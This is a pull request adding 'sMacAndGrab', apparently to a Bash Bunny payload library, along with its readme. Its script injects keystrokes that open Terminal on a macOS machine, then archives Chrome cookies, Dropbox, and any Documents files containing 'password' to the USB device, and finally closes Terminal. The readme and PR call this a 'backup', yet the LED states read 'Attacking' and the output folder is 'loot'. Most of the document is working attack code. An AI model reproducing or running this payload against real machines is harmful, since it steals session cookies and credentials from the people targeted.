### PR TITLE
[PAYLOAD] Dynamic macOS file backups

### DIFF
--- a/payloads/library/SmacAndGrab/payload.txt
+++ b/payloads/library/SmacAndGrab/payload.txt
@@ -1,0 +1,39 @@
+#!/bin/bash
+#
+# Title:         sMacAndGrab
+# Author:        audibleblink
+# Target:      macOS
+# Version:       1.0
+#
+# Backup a list of files from macOS
+#
+# Yellow (blinking)...Attacking
+# Green...............Finished
+
+LED G R 500
+ATTACKMODE HID STORAGE
+
+mkdir -p /root/udisk/loot/sMacAndGrab
+
+# Unknown devices mount as NO NAME
+dev_name="NO NAME"
+lootdir="\"/Volumes/$dev_name/loot/sMacAndGrab\""
+
+# Add your files here
+files_to_copy=(
+"\"~/Library/Application Support/Google/Chrome/Default/Cookies\"" # Quote paths with spaces
+"~/Dropbox"
+"\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET
+)
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 4000
+QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal
+QUACK ENTER
+
+sync
+LED G
+

--- a/payloads/library/SmacAndGrab/readme.md
+++ b/payloads/library/SmacAndGrab/readme.md
@@ -1,0 +1,22 @@
+# sMacAndGrab
+
+Author: audibleblink
+Version: Version 1.0
+Target: macOS
+
+## Description
+
+Mounts as storage and acts as HID. Backup a list of files to the BashBunny
+
+## Configuration
+
+Provide a newline-separated list of files you want to backup and wait for the green light.
+You can also provide `find` and `grep` commands as literal strings to pass to QUACK which get run on TARGET.
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Amber (blinking) | Attacking                             |
+| Green            | Finished                              |
+


### PR DESCRIPTION
This payload lets you define a list of files to backup.

It also accepts `find` and `grep` subshell commands as "filenames" to dynamically and conditionally copy files.